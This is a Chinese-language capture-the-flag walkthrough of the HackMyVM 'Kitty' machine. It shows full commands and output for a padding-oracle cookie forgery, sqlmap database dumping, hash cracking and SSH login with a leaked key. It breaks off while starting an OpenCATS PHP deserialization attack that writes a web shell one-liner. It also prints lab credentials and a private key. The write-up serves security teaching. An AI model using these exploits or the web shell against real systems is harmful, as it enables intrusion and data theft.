HackMyVM-Kitty-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.138  08:00:27:ad:a1:49       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:ff:d5:c8       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.051 seconds (124.82 hosts/sec). 4 responded
❯ export ip=192.168.60.138
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.138:22
Open 192.168.60.138:80
Open 192.168.60.138:3000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-15 15:04 CST
Initiating ARP Ping Scan at 15:04
Scanning 192.168.60.138 [1 port]
Completed ARP Ping Scan at 15:04, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:04
Completed Parallel DNS resolution of 1 host. at 15:04, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:04
Scanning 192.168.60.138 [3 ports]
Discovered open port 3000/tcp on 192.168.60.138
Discovered open port 80/tcp on 192.168.60.138
Discovered open port 22/tcp on 192.168.60.138
Completed SYN Stealth Scan at 15:04, 0.06s elapsed (3 total ports)
Nmap scan report for 192.168.60.138
Host is up, received arp-response (0.00040s latency).
Scanned at 2025-04-15 15:04:56 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
3000/tcp open  ppp     syn-ack ttl 64
MAC Address: 08:00:27:AD:A1:49 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

浏览器访问一下，发现绑定了域名

编辑hosts文件，添加域名

❯ echo "$ip kitty.hmv"|sudo tee -a /etc/hosts
[sudo] password for Pepster:
192.168.60.138 kitty.hmv

尝试访问3000端口

存在一个gitea的私有仓库的服务，无弱密码后返回80端口

目录枚举

❯ gobuster dir -u http://kitty.hmv/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 50 -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://kitty.hmv/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 169] [--> http://kitty.hmv/images/]
/css                  (Status: 301) [Size: 169] [--> http://kitty.hmv/css/]
/js                   (Status: 301) [Size: 169] [--> http://kitty.hmv/js/]
/index.html           (Status: 200) [Size: 5381]
/license.txt          (Status: 200) [Size: 1244]
Progress: 132920 / 132925 (100.00%)
===============================================================
Finished
===============================================================

浏览器简单看了一下，好像是没有其他路径，只是套了一个模板

枚举子域名

利用此域名，尝试枚举子域名，得到cookie.kitty.hmv

❯ wfuzz -c -u "http://kitty.hmv/" -H "HOST:FUZZ.kitty.hmv" -H "User-Agent:Mozilla/5.0" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 11
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://kitty.hmv/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000003045:   200        37 L     105 W      2785 Ch     "cookie - cookie"

再次编辑hosts文件

❯ echo "$ip cookie.kitty.hmv"|sudo tee -a /etc/hosts
[sudo] password for Pepster:
192.168.60.138 cookie.kitty.hmv

浏览器尝试访问一下，发现存在注册功能

经尝试发现已经存在admin用户

不过可以注册一个新的用户

Cookie 爆破

注册后自动进行登录，会分配一个Cookie

在这里我们可以使用padbuster(自动化填充oracle攻击脚本)

因为在CBC加密的模式下，加密的最后一个block可能需要填充(padding)以对齐到固定的块大小

如果服务器返回的错误消息中区分了正确和错误，那么就可以逐字解密数据

我们解密此Cookie的密文信息，进行重写达到伪造admin用户的目的

❯ padbuster http://cookie.kitty.hmv/home/index.php m6E%2BU7HHqdPtkP0CKHFQHO%2FXdn7FeCmU 8 -cookies 'auth=m6E%2BU7HHqdPtkP0CKHFQHO%2FXdn7FeCmU'

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| [email protected]                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 8144

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       302     8144    ../login.php
2 **    255     302     0       ../logout.php?err=1
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (79/256) [Byte 8]
[+] Success: (55/256) [Byte 7]
[+] Success: (91/256) [Byte 6]
[+] Success: (120/256) [Byte 5]
[+] Success: (220/256) [Byte 4]
[+] Success: (163/256) [Byte 3]
[+] Success: (43/256) [Byte 2]
[+] Success: (26/256) [Byte 1]

Block 1 Results:
[+] Cipher Text (HEX): ed90fd022871501c
[+] Intermediate Bytes (HEX): eed25b218ca6cbb0
[+] Plain Text: user=abc

Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***

[+] Success: (235/256) [Byte 8]
[+] Success: (166/256) [Byte 7]
[+] Success: (134/256) [Byte 6]
[+] Success: (220/256) [Byte 5]
[+] Success: (241/256) [Byte 4]
[+] Success: (13/256) [Byte 3]
[+] Success: (97/256) [Byte 2]
[+] Success: (19/256) [Byte 1]

Block 2 Results:
[+] Cipher Text (HEX): efd7767ec5782994
[+] Intermediate Bytes (HEX): e598f50a20795814
[+] Plain Text:

-------------------------------------------------------
** Finished ***

[+] Decrypted value (ASCII): user=abc

[+] Decrypted value (HEX): 757365723D6162630808080808080808

[+] Decrypted value (Base64): dXNlcj1hYmMICAgICAgICA==

-------------------------------------------------------

在上面解密得到我的数据为user=abc，利用-plaintext反过来加密指定明文

改成user=admin

❯ padbuster http://cookie.kitty.hmv/home/index.php m6E%2BU7HHqdPtkP0CKHFQHO%2FXdn7FeCmU 8 -cookies 'auth=m6E%2BU7HHqdPtkP0CKHFQHO%2FXdn7FeCmU' -plaintext user=admin

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| [email protected]                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 8144

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 2

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       302     8144    ../login.php
2 **    255     302     0       ../logout.php?err=1
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (196/256) [Byte 8]
[+] Success: (148/256) [Byte 7]
[+] Success: (92/256) [Byte 6]
[+] Success: (41/256) [Byte 5]
[+] Success: (218/256) [Byte 4]
[+] Success: (136/256) [Byte 3]
[+] Success: (150/256) [Byte 2]
[+] Success: (190/256) [Byte 1]

Block 2 Results:
[+] New Cipher Text (HEX): 23037825d5a1683b
[+] Intermediate Bytes (HEX): 4a6d7e23d3a76e3d

[+] Success: (1/256) [Byte 8]
[+] Success: (36/256) [Byte 7]
[+] Success: (180/256) [Byte 6]
[+] Success: (17/256) [Byte 5]
[+] Success: (146/256) [Byte 4]
[+] Success: (50/256) [Byte 3]
[+] Success: (132/256) [Byte 2]
[+] Success: (135/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 0408ad19d62eba93
[+] Intermediate Bytes (HEX): 717bc86beb4fdefe

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------

SQL 注入

得到新的cookie进行修改后，发现多了一个新的页面logs

但不会进行页面跳转，只是在地址后面加了锚点链接

并且通过检查元素可以得知在logs父元素的相邻代码中调用了../config/last_login.js此JavaScript脚本

async function getUsers() {
    let url = 'http://cookie.kitty.hmv/home/logs.php?ajneya=admin';
    try {
        let res = await fetch(url);
        return await res.text();
    } catch (error) {
        console.log(error);
    }
}

async function renderUsers() {
    let users = await getUsers();
    let container = document.querySelector('.content');
    container.innerHTML = users;
}

renderUsers();

因此可以猜测存在SQL注入的漏洞

利用SQLmap梭哈一下，带上管理员的cookie

❯ sqlmap -u "http://cookie.kitty.hmv/home/logs.php?ajneya=" --cookie="auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA" --batch --dbs
………………省略………………
---
Parameter: ajneya (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ajneya=') AND (SELECT 2969 FROM (SELECT(SLEEP(5)))izET) AND ('Ttnh'='Ttnh

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: ajneya=') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707871,0x587a534c78507167514d614676706c46514576726a6c7a4a6e43537a425a466c62686a5347666967,0x7178717671)-- -
---
[08:51:22] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:51:22] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] padding

❯ sqlmap -u "http://cookie.kitty.hmv/home/logs.php?ajneya=" --cookie="auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA" --batch -D padding --tables

+-------+
| logs  |
| salt  |
| users |
+-------+


❯ sqlmap -u "http://cookie.kitty.hmv/home/logs.php?ajneya=" --cookie="auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA" --batch -D padding -T users --dump

+----------------------------------+----------+
| password                         | username |
+----------------------------------+----------+
| 44db80f98c693eac47540c51137eeeac | admin    |
| 357f47546ba3ab1cf633d3d0c54e2583 | gitea    |
| 389f0e97fd82500213e3273c83bfadf7 | aaa      |
| f9c6608c9747c3722a244bc797a28578 | abc      |
+----------------------------------+----------+

❯ sqlmap -u "http://cookie.kitty.hmv/home/logs.php?ajneya=" --cookie="auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA" --batch -D padding -T salt --dump

+--------+--------------+
| type   | value        |
+--------+--------------+
| salt   | YXZpam5leWFt |
+--------+--------------+

HashCat 爆破

从中得到了gitea的用户凭证以及用于加密salt(盐)

其实这个盐就是avijneyam作者昵称的base64哈哈

尝试利用hashcat进行md5加盐爆破

得到密码git0ffme

❯ echo "357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt"|tee hash
357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt
❯ hashcat -a 0 -m 10 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
……………………省略………………

357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt:git0ffme

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10 (md5($pass.$salt))
Hash.Target......: 357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt
Time.Started.....: Fri Apr 18 09:05:33 2025 (3 secs)
Time.Estimated...: Fri Apr 18 09:05:36 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3540.5 kH/s (0.10ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7866368/14344385 (54.84%)
Rejected.........: 0/7866368 (0.00%)
Restore.Point....: 7864320/14344385 (54.83%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: giuli89 -> gisel1207

Started: Fri Apr 18 09:05:33 2025
Stopped: Fri Apr 18 09:05:38 2025

我们利用gitea:git0ffme此凭证登录gitea服务

在关闭的issues中发现另一个存在的域名whythisapiissofast.kitty.hmv

浏览器尝试访问一下

得知是API端点

利用curl访问此api路径

访问-1 -2的数字可以得到用户名和私钥内容

❯ curl whythisapiissofast.kitty.hmv/api/v1/public
{"key":"success","value":"Hello from a public endpoint! You don't need to be authenticated to see this."}
❯ curl whythisapiissofast.kitty.hmv/api/v2/1
{"Error":"1 is Wrong Number. Try Again!"}
❯ curl whythisapiissofast.kitty.hmv/api/v2/-1
{"success":"Yay! You Found Login Credentials","Credentials":"nobody : 74k3!7345y"}
❯ curl whythisapiissofast.kitty.hmv/api/v2/-2
"-----BEGIN OPENSSH PRIVATE KEY-----\n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\n-----END OPENSSH PRIVATE KEY-----"

得到私钥文件，我们稍微处理一下换行的转义符

❯ cat id_rsa|sed 's/\\n/\n/g'
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

用户提权

查看私钥的备注信息，得到用户dyutidhara

❯ ssh-keygen -c -f id_rsa
Old comment: dyutidhara@free4all
New comment:

ssh连接一下

拿到user flag了

❯ ssh dyutidhara@$ip -i id_rsa
The authenticity of host '192.168.60.138 (192.168.60.138)' can't be established.
ED25519 key fingerprint is SHA256:hyaH0n5p7+5xBVQEL/hRIeOVRNWsLv8qjefRknYQi6Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.138' (ED25519) to the list of known hosts.
Linux kitty 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 29 06:39:26 2022 from 192.168.1.5
dyutidhara@kitty:~$ cat user.txt
3702f4d1247163b61b1cd8b368539cbf

同时可以发现本地开放8000 3306端口

dyutidhara@kitty:/opt/opencats$ ss -luntp
Netid         State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port         Process
udp           UNCONN          0               0                              0.0.0.0:68                          0.0.0.0:*
tcp           LISTEN          0               2048                         127.0.0.1:8000                        0.0.0.0:*
tcp           LISTEN          0               80                           127.0.0.1:3306                        0.0.0.0:*
tcp           LISTEN          0               511                            0.0.0.0:80                          0.0.0.0:*
tcp           LISTEN          0               128                            0.0.0.0:22                          0.0.0.0:*
tcp           LISTEN          0               128                               [::]:22                             [::]:*
tcp           LISTEN          0               4096                                 *:3000                              *:*

其实访问whythisapiissofast.kitty.hmv此API端点就是跳转到本地的8000端口

另外在/opt下存在一个文件夹/opt/opencats

查看一下nginx的配置文件，得到另一个域名thisisnotcatitisopencats.kitty.hmv

再次编辑hosts文件

dyutidhara@kitty:/tmp$ cat /etc/nginx/sites-available/opencats
server {
        listen 80;
        server_name thisisnotcatitisopencats.kitty.hmv;
        root /opt/opencats;
        index index.html index.htm index.php;
        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/power.sock;
        }

}

密码泄露

我们是白盒操作，我们可以查看opencats的config文件

从中得到数据库的连接凭证opencats:0p3nc@75

dyutidhara@kitty:/opt/opencats$ mysql -uopencats -p0p3nc@75
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 9466
Server version: 10.5.15-MariaDB-1:10.5.15+maria~bullseye mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| opencats           |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use opencats;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [opencats]> select * from user\G
*************************** 1. row ***************************
                  user_id: 1
                  site_id: 1
                user_name: admin
                    email: [email protected]
                 password: 370835cf169b8c84c112ad32811ba1d6
             access_level: 500
      can_change_password: 1
             is_test_user: 0
                last_name: Administrator
               first_name: CATS
                  is_demo: 0
               categories: NULL
           session_cookie: CATS=qelf7cm7p2t4436csodak92r0a
pipeline_entries_per_page: 15
       column_preferences: a:4:………………省略…………
             force_logout: 0
                    title:
               phone_work:
               phone_cell:
              phone_other:
                  address: NULL
                    notes: NULL
                  company: NULL
                     city: NULL
                    state: NULL
                 zip_code: NULL
                  country: NULL
         can_see_eeo_info: 0
*************************** 2. row ***************************
                  user_id: 1250
                  site_id: 180
                user_name: cats@rootadmin
                    email: 0
                 password: cantlogin
             access_level: 0
      can_change_password: 0
             is_test_user: 0
                last_name: Automated
               first_name: CATS
                  is_demo: 0
               categories: NULL
           session_cookie: NULL
pipeline_entries_per_page: 15
       column_preferences: NULL
             force_logout: 0
                    title:
               phone_work:
               phone_cell:
              phone_other:
                  address: NULL
                    notes: NULL
                  company: NULL
                     city: NULL
                    state: NULL
                 zip_code: NULL
                  country: NULL
         can_see_eeo_info: 0
2 rows in set (0.000 sec)

MariaDB [opencats]>

拿到用户名和密码hash

明文密码为4jn3y4

Root提权

浏览器尝试登录一下

发现其中版本为OpenCATS Version 0.9.5.2

寻找其相关的POC

PHP 反序列化

OpenCATS PHP 对象注入到任意文件写入 |💻 |博客

参考上述链接，在此版本中存在反序列化的漏洞

需要利用phpggc工具创建反序列化的payload

ambionics/phpggc：PHPGGC 是一个 PHP unserialize（） 有效负载库，以及一个从命令行或以编程方式生成它们的工具。

❯ git clone https://github.com/ambionics/phpggc.git
Cloning into 'phpggc'...
remote: Enumerating objects: 4769, done.
remote: Counting objects: 100% (887/887), done.
remote: Compressing objects: 100% (279/279), done.
remote: Total 4769 (delta 687), reused 608 (delta 608), pack-reused 3882 (from 2)
Receiving objects: 100% (4769/4769), 695.29 KiB | 2.28 MiB/s, done.
Resolving deltas: 100% (2186/2186), done.
❯ echo '<?php echo shell_exec($_GET["e"] . " 2>&1"); ?>' | tee shell.php
<?php echo shell_exec($_GET["e"] . " 2>&1"); ?>
❯ ./phpggc -u --fast-destruct Guzzle/FW1 /opt/opencats/shell.php shell.php

